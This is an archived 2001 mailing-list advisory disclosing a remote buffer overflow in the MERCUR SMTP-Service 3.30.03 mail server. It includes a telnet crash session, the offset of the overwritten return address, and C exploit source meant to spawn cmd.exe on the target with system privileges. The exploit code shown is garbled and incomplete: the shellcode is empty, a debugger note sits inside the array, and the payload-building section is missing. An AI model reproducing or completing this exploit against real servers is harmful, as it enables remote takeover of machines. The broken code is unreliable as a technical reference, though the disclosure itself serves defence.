Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: Martin NA (martinDIRECT.SPB.RU)
Date: Fri Feb 23 2001 - 06:32:10 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    By default SMTP server is installed to be run from
    LocalSystem account.
    This makes it easy to make any action on the target
    system if an attacker
    could gain control over the code execution flow of the

    Particulary, MERCUR SMTP-Service (binary
    MCRSMTP.EXE version
    suffers from buffer overflow illustrated below:

    -- Telnet session start --

    220 MERCUR SMTP-Server (v3.30.03 Unregistered)
    for Windows NT ready at Thu,
    15 F
    eb 2001 03:55:34 -0800

    Connection to host lost.


    -- Telnet session end --

    Submission of string which contains address the
    processor should jump to at
    position 133,134,135 and 136 will gain full control
    over the machine...

    Here is exploit that runs an instance of cmd.exe on
    target host:

     MERCUR Mailserver 3.3 Remote Buffer Overflow
     Tested on Win2K AS SP1 with MERCUR SMTP-
    Server v3.30.03
     Martin Rakhmanoff

    #include <winsock2.h>
    #include <stdio.h>

    /* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */
    char shellcode[] =
    In SoftICE bpx 001b:00418b65 - here eip is restored
    with overwritten

    int main(int argc, char * argv[]){

     int i;
     char sploit[512];
     char buffer[512];

     WSADATA wsaData;
     SOCKET sock;
     struct sockaddr_in server;
     struct hostent *hp;

     hp = gethostbyname("arena");
     server.sin_family = hp->h_addrtype;
     server.sin_port = htons(25);
     sock = socket(AF_INET,SOCK_STREAM,0);
     connect(sock,(struct sockaddr*)&server,sizeof



     // Return address






     return 0;

    Vendor was notified but no action was done...